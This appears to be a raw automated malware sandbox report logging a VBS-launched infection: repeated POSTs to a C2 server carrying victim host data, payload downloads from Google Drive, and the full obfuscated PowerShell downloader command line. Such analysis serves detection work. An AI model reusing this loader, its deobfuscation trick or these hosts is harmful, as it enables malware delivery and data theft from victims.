                                Sep 30, 2024 10:04:33.404478073 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:36.025727034 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:33 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                21 | 192.168.2.4 | 49762 | 137.184.191.215 | 80 | 416 | C:\Windows\SysWOW64\msiexec.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 30, 2024 10:04:36.555095911 CEST | 241 | OUT | POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:36.560029984 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:39.113044977 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:37 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                22 | 192.168.2.4 | 49763 | 137.184.191.215 | 80 | 416 | C:\Windows\SysWOW64\msiexec.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 30, 2024 10:04:39.357562065 CEST | 241 | OUT | POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:39.362493992 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:41.940439939 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:39 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                23 | 192.168.2.4 | 49764 | 137.184.191.215 | 80 | 416 | C:\Windows\SysWOW64\msiexec.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 30, 2024 10:04:42.104583025 CEST | 241 | OUT | POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:42.109431028 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:44.759974957 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:42 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                24 | 192.168.2.4 | 49765 | 137.184.191.215 | 80 | 416 | C:\Windows\SysWOW64\msiexec.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 30, 2024 10:04:44.916829109 CEST | 241 | OUT | POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:44.921691895 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:47.588433981 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:45 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                25 | 192.168.2.4 | 49766 | 137.184.191.215 | 80 | 416 | C:\Windows\SysWOW64\msiexec.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 30, 2024 10:04:47.745021105 CEST | 241 | OUT | POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:47.749965906 CEST  149                OUT        Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:50.391940117 CEST  1236               IN         HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:48 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8


                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                26          192.168.2.4  49767        137.184.191.215  80                416   C:\Windows\SysWOW64\msiexec.exe
                                Timestamp                             Bytes transferred  Direction  Data
                                Sep 30, 2024 10:04:50.542316914 CEST  241                OUT        POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:50.551239014 CEST  149                OUT        Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:53.167238951 CEST  1236               IN         HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:51 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8


                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                27          192.168.2.4  49768        137.184.191.215  80                416   C:\Windows\SysWOW64\msiexec.exe
                                Timestamp                             Bytes transferred  Direction  Data
                                Sep 30, 2024 10:04:53.316770077 CEST  241                OUT        POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:53.321681023 CEST  149                OUT        Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:55.967161894 CEST  1236               IN         HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:53 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8


                                Session ID  Source IP    Source Port  Destination IP   Destination Port
                                28          192.168.2.4  49769        137.184.191.215  80
                                Timestamp                             Bytes transferred  Direction  Data
                                Sep 30, 2024 10:04:56.114135981 CEST  241                OUT        POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:56.119034052 CEST  149                OUT        Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:58.721940041 CEST  1236               IN         HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:56 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8


                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                0           192.168.2.4  49730        142.250.185.206  443               6648  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Timestamp                Bytes transferred  Direction  Data
                                2024-09-30 08:02:50 UTC  215                OUT        GET /uc?export=download&id=1nqjXMkuy0HQzk_iGcoAJbDrbsZjAvxAb HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: drive.google.com
                                Connection: Keep-Alive
                                2024-09-30 08:02:51 UTC  1610               IN         HTTP/1.1 303 See Other
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Mon, 30 Sep 2024 08:02:51 GMT
                                Location: https://drive.usercontent.google.com/download?id=1nqjXMkuy0HQzk_iGcoAJbDrbsZjAvxAb&export=download
                                Strict-Transport-Security: max-age=31536000
                                Content-Security-Policy: script-src 'nonce-26J6yK4fU_QTZHHUabJn3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                Cross-Origin-Opener-Policy: same-origin
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close


                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                1           192.168.2.4  49731        142.250.184.193  443               6648  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Timestamp                Bytes transferred  Direction  Data
                                2024-09-30 08:02:51 UTC  233                OUT        GET /download?id=1nqjXMkuy0HQzk_iGcoAJbDrbsZjAvxAb&export=download HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: drive.usercontent.google.com
                                Connection: Keep-Alive
                                2024-09-30 08:02:54 UTC  4855               IN         HTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Content-Security-Policy: sandbox
                                Content-Security-Policy: default-src 'none'
                                Content-Security-Policy: frame-ancestors 'none'
                                X-Content-Security-Policy: sandbox
                                Cross-Origin-Opener-Policy: same-origin
                                Cross-Origin-Embedder-Policy: require-corp
                                Cross-Origin-Resource-Policy: same-site
                                X-Content-Type-Options: nosniff
                                Content-Disposition: attachment; filename="premedicate.cur"
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Credentials: false
                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                Accept-Ranges: bytes
                                Content-Length: 459596
                                Last-Modified: Mon, 30 Sep 2024 02:03:35 GMT
                                X-GUploader-UploadID: AD-8ljscEEkC16N-yr8wNO8-J_jnkUvW9xVJAbtQg25oDqNPDT_Lphfc_F-2SdvCuM2Nmcp9uws-3_GT_g
                                Date: Mon, 30 Sep 2024 08:02:54 GMT
                                Expires: Mon, 30 Sep 2024 08:02:54 GMT
                                Cache-Control: private, max-age=0
                                X-Goog-Hash: crc32c=aYbETg==
                                Server: UploadServer
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close
                                2024-09-30 08:02:54 UTC1390INData Raw: 49 6a 64 69 73 2f 64 48 35 49 4f 71 4f 32 67 65 44 51 54 59 4d 32 6c 79 43 61 6b 65 5a 67 7a 39 77 35 55 6e 35 31 2b 39 41 78 35 49 6e 6e 66 77 32 4d 4c 39 4c 37 63 65 2f 42 70 74 31 71 4f 69 75 49 37 58 74 54 52 59 44 43 55 67 6c 56 30 44 6d 45 62 30 56 7a 55 51 54 6e 68 59 45 53 65 6f 41 36 74 7a 4f 39 41 68 70 71 69 38 77 59 71 4c 72 50 2f 55 33 77 68 4f 77 7a 35 7a 67 69 73 6d 54 6a 37 30 47 49 49 38 31 42 38 6b 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43
                                Data Ascii: Ijdis/dH5IOqO2geDQTYM2lyCakeZgz9w5Un51+9Ax5Innfw2ML9L7ce/Bpt1qOiuI7XtTRYDCUglV0DmEb0VzUQTnhYESeoA6tzO9Ahpqi8wYqLrP/U3whOwz5zgismTj70GII81B8kAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAAC
                                2024-09-30 08:02:54 UTC1390INData Raw: 67 72 47 52 4b 48 48 79 4d 38 30 79 32 74 77 2f 53 4b 67 4a 64 54 4f 78 50 54 32 35 33 67 4d 73 58 62 35 34 76 4b 68 4a 6b 4b 45 78 78 71 6e 4e 6f 58 36 65 6b 37 6b 4c 75 6d 65 56 33 48 6c 53 7a 70 39 2b 6f 30 4e 49 4c 55 42 41 41 6f 64 6a 53 70 64 65 6a 4a 77 6e 6c 4f 39 34 4d 44 49 71 59 4d 42 75 43 52 56 33 47 71 5a 6a 75 46 67 62 37 32 47 50 2b 35 31 43 34 42 6b 4f 66 47 4d 64 63 52 6a 66 42 68 6f 36 56 6d 6d 56 4e 43 31 39 31 6a 6d 65 47 5a 56 57 35 33 69 2b 62 64 7a 62 64 62 7a 71 51 33 65 6c 76 66 53 58 36 47 6b 68 78 75 6a 54 67 41 6a 72 58 52 31 35 5a 70 30 58 4a 62 71 71 4c 58 73 66 36 36 2f 51 6b 67 4d 65 55 50 6a 46 4c 58 73 4e 72 33 32 2b 35 6c 54 76 65 66 41 31 36 6b 2f 41 4c 77 71 49 4e 38 45 78 64 55 5a 39 32 70 5a 42 76 34 75 2b 5a 39 6b
                                Data Ascii: grGRKHHyM80y2tw/SKgJdTOxPT253gMsXb54vKhJkKExxqnNoX6ek7kLumeV3HlSzp9+o0NILUBAAodjSpdejJwnlO94MDIqYMBuCRV3GqZjuFgb72GP+51C4BkOfGMdcRjfBho6VmmVNC191jmeGZVW53i+bdzbdbzqQ3elvfSX6GkhxujTgAjrXR15Zp0XJbqqLXsf66/QkgMeUPjFLXsNr32+5lTvefA16k/ALwqIN8ExdUZ92pZBv4u+Z9k


                                Session ID:2
                                Source IP:192.168.2.4
                                Source Port:49738
                                Destination IP:142.250.185.206
                                Destination Port:443
                                PID:416
                                Process:C:\Windows\SysWOW64\msiexec.exe
                                Timestamp:2024-09-30 08:03:32 UTC
                                Bytes transferred:216
                                Direction:OUT
                                Data:
                                GET /uc?export=download&id=1OhT-yOF4bkZNovQ0kzaZfhJv1MXwb5Yy HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: drive.google.com
                                Cache-Control: no-cache
                                Timestamp:2024-09-30 08:03:32 UTC
                                Bytes transferred:1610
                                Direction:IN
                                Data:
                                HTTP/1.1 303 See Other
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Mon, 30 Sep 2024 08:03:32 GMT
                                Location: https://drive.usercontent.google.com/download?id=1OhT-yOF4bkZNovQ0kzaZfhJv1MXwb5Yy&export=download
                                Strict-Transport-Security: max-age=31536000
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                Cross-Origin-Opener-Policy: same-origin
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Content-Security-Policy: script-src 'nonce-eWseaf3MyVANxBMEj4wmFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close


                                Session ID:3
                                Source IP:192.168.2.4
                                Source Port:49739
                                Destination IP:142.250.184.193
                                Destination Port:443
                                PID:416
                                Process:C:\Windows\SysWOW64\msiexec.exe
                                Timestamp:2024-09-30 08:03:33 UTC
                                Bytes transferred:258
                                Direction:OUT
                                Data:
                                GET /download?id=1OhT-yOF4bkZNovQ0kzaZfhJv1MXwb5Yy&export=download HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Cache-Control: no-cache
                                Host: drive.usercontent.google.com
                                Connection: Keep-Alive
                                Timestamp:2024-09-30 08:03:36 UTC
                                Bytes transferred:4857
                                Direction:IN
                                Data:
                                HTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Content-Security-Policy: sandbox
                                Content-Security-Policy: default-src 'none'
                                Content-Security-Policy: frame-ancestors 'none'
                                X-Content-Security-Policy: sandbox
                                Cross-Origin-Opener-Policy: same-origin
                                Cross-Origin-Embedder-Policy: require-corp
                                Cross-Origin-Resource-Policy: same-site
                                X-Content-Type-Options: nosniff
                                Content-Disposition: attachment; filename="iOvNTpfgMcg40.bin"
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Credentials: false
                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                Accept-Ranges: bytes
                                Content-Length: 106560
                                Last-Modified: Mon, 30 Sep 2024 02:00:00 GMT
                                X-GUploader-UploadID: AD-8ljt9b1FTRGtdM5UQGTd34ek1itLiOpJpg3kPQzwS0DwsBInilL_zHb7aYrTAKVYM_SjEqiTZoZv0lQ
                                Date: Mon, 30 Sep 2024 08:03:35 GMT
                                Expires: Mon, 30 Sep 2024 08:03:35 GMT
                                Cache-Control: private, max-age=0
                                X-Goog-Hash: crc32c=deOd8w==
                                Server: UploadServer
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close


                                Target ID:0
                                Start time:04:02:43
                                Start date:30/09/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs"
                                Imagebase:0x7ff6c6810000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:1
                                Start time:04:02:46
                                Start date:30/09/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl 